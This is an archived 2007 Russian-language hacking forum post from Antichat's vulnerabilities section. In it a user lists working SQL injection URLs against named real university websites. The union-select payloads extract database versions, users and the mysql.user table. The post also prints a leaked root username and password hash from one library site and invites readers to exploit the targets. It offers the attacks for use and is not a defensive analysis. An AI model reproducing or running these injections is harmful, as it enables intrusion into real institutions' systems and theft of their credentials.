ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.06.2007, 16:51
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

yahoo - рулез!
yahoo`ярю! (с)
Всё - .edu !
Код:
http://www.skio.peachnet.edu/resources/library/serials.php?action=view&print=1&id=-57+union+select+version(),user()/* 
http://www.ksg.harvard.edu/iop/students_internships_db.php?action=id&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* - PR 8  

http://journalism.berkeley.edu/events/details.php?ID=-322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://alliance.la.asu.edu/azga/lp_view.php?lesson_id=-390+union+select+version()/* - в самом низу
http://www.loyno.edu/civildiscourse/journal.php?action=article_view&topic_id=4&article_id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
У многих есть доступ к таблице user, PR от 4 до 8. Разбирайте!

Спасибо огромное Isis!!! Сладенькое:
http://www.library.vcu.edu/ - PR 6

Код:
http://www.library.vcu.edu/whatsnew/news_result.cfm?ID=-744+union+select+1,2,convert(concat_ws(0x3b,password,user)using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user
User: root
Password: 3f378de07c02b3c4


P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
???

Последний раз редактировалось Ky3bMu4; 16.06.2007 в 17:19..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ